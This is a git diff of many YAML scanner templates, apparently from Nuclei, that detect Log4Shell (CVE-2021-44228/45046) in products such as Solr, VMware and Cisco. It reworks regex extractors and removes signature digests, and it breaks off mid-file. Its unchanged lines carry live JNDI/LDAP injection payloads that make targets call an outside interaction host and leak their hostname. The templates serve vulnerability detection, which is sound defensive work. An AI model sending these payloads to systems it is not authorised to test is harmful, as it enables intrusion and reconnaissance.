diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index d71c5a3652..6177bcd577 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -35,6 +35,7 @@ http: - | GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} + - | GET / HTTP/1.1 Host: {{Hostname}} @@ -58,7 +59,6 @@ http: X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}} stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -74,7 +74,7 @@ http: extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 @@ -86,5 +86,4 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - part: interactsh_request -# digest: 4b0a00483046022100cdec4b5d8980cc136a59c99bdf67592c090c7e3f38099f240f8e632a3a1716bd022100b6df914d5c1c27af20c1aeb0f9ac78a20ff66f9e04e188c0bbf641443db1ef02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 38d258b42a..01b594c0d3 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -66,7 +66,7 @@ http: extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 @@ -77,5 +77,4 @@ http: group: 1 regex: - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output - part: interactsh_request -# digest: 4a0a00473045022100c60fb46ec715ed6c4218ace6f3f46cdee865c987b0e3cb1a7d36621319e40819022056b9f2ed8a695079a54387d8d7cf81b255d60d203871db28aad5a34c07024ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 27d56bb26b..e4a127636d 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -42,20 +42,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100d00b7aa2d5fc2cf73ebc5413a3019767ef23cc4180b3335c7c9b6258c1d9435b0221008ccd0daf25810e5c58d9bd86ea2afe24c55ea36a88369c6f0258d09dc7fd1b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 1dcb9f3d08..3f3f23833f 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -55,20 +55,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100dff546abd1c1e52272d68cc689729d7dc1d7c01592bb9d190c3e341a4ef1589f022009b0a0a3bae2340288fe8bb13505dc8796bd42f342a68fbe987e27b0c715e100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index ba28756c50..34a2f03b02 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -52,20 +52,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100d198ac01af3dc8bde3d25f49bd41b5a8268aab1617dfd11cae4bde977db88f30022100b24c3f88bee3eb6548048575e454334964b5718816e7822da6631a0c83e68f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index a7e3d5129d..6b0f2fdd23 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml @@ -51,20 +51,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402204424d1b4c2ca756d2efe801b61859c28cc5facffd3f3e4877975d0ac6074e1fe02203eecf6378824ef30aa1c761d41d9768ad11e42700caf148aa90fa8483a9c4769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 1e4e230727..09b37aafc1 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402202603ae664b279e6055139e3d6fa89c744ba9d7bea89035d6a74f8fc5813e688d02207445fffe3cff7440d500f138193a25d8995e5c4da30c7d26f18bfc50c43453ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index d077d74342..efc8787267 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -42,20 +42,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100d514fdc8236eb4a3d7e30f0d03dde613b2369e2ebcce1164795a44f45d73649f02203bb36fa5f1165f96f8993fd90d5fea37284702557e484e7428891ff09b8d542c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index e246a75a15..055250d457 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -51,20 +51,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a0047304502205dc4953c115d06cb7f71f87981a60e87c24769618f1795d9ce80a988b210f12e022100fe46ec47b7fc95edad6766539c2444ff012019d14680d45f79210fc693d9c128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index d812d59a0d..ff98a1ae66 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a004730450221008f9e5730500675fa4925e8e899fde41bd5825b8e0cbd90da49b1c77ccaf46de802203f967f91f213d910140e390b564d60705c8210764386109bd553f4d1a452e153:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 685f52f6e6..44115cca5a 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -47,20 +47,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100c16edd83e05c94591418430a6e0d02229617c11c9bfa14b9160652d1c04a9df002206bc2f82e47ddf948eae00a265b6088f5f70a47511aa28b5f520e0e0e2a786413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index fe643c44dd..0f3e609bc8 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -49,7 +49,7 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex @@ -62,15 +62,16 @@ http: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402201afb2e9417d23c2ea5368ccdfa0445cf3517d34b8db7f1b1d1a7defdb6cfa2cb022003c6ba2ee9d8d3d0eae58e5dc118e86f51e2a8ce68176a5012c83c0e3edd0b67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 0198af25e5..51b7e9466b 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -52,20 +52,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100ccc0573689b16d9bd838b2cfb5413a29132d6ee56a8c64a8681041188b6b3547022100e1fc3a7b8ff5cb752a894725af76ff9de1aebc03db85cfe5804168f4c7d6ef20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index a3e5e658e7..7da6c35dff 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -43,20 +43,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100dbbf7b611410f248325e1c76e5b42ef46f2a3ed5e99dac5a7771351a0b9d089b022100b9b7bc718ff9252518c7ad0de841a4f78da98db5dd7c35dd15a77fd4e4b06273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 929eb16241..a93f9171a4 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022057f2fba3cf03ecda6d62398b7a33c35412da550ce0c0ed2e9b7efda5743b0aae022100d133541112f6985ba8a61e752a22887ebe5093fead4bf1d338a8db4a21efbcf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index 370e0629a9..da29ba0a68 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a00463044022052eb1e9d2ac6b84a6a306516b90c92df82ffb02d8c3d76c6bab2945c3d9010d102204f46bd311bece2e0552a805f48b833c5a315fb7701489b934a3cf586e2132ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index ef09ef1ce2..e689f0c69b 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -46,20 +46,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402201f00b763e60670eec4283cda688678c4e072812d507e7c066d8a72b2c11a84e7022044154ccfa0a8df95360d1e8c2cd27aa00ee74f2285de0e049f96f5ea8297180b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index 8d6e654328..ac57369a16 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml @@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100b57bf84433fbff96d04708b92b9957bee63cbac77446b0273cbd2888976457ce02203d18d48e50e0476b5f99e8a86515c9ffc4ce8735f352d248b0cb1f3cabf4a416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index 4fe2319692..cb7f348550 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100fab4ecc41af0191778534b4efdb7edf6c61d25404c616aa1cda9a5dd3b577739022057b251f28bce03d9d78a089ff41f154631efc03ce5f1079318dcc433d9f8c10c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index 66b8809de2..6995f768d0 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -40,20 +40,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a00463044022021f25a1985d55a727c597cbdaaf28bdf2a5b7519e4c6440907998f73d6766ad202207c93c7fc8670170f175a470f6e3845413b8e8ec6fdfe6f84d2f67fb0fbcb7387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index 8841fdc897..0f44b2e6e3 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -49,20 +49,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a004730450220022242a54624b114b3874d75963250ea54ad342e3e3991395d5dd6346915d36f022100b336a35af96afd9093735c3d2e75fd2324bd5b53870017395dd8aa690217e500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml index 9b6ce47803..344eef197e 100644 --- a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -47,4 +47,3 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output part: interactsh_request -# digest: 4a0a00473045022037762439401b8e794c524db32078ec70147f5bd2f5d61e70feb310d8877d5f5e022100b1e9fa52d2f223d67b072aa79b77cd6219eee33cf4de20310f86d5b7334046e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml index 416e3290ca..f4677deee3 100644 --- 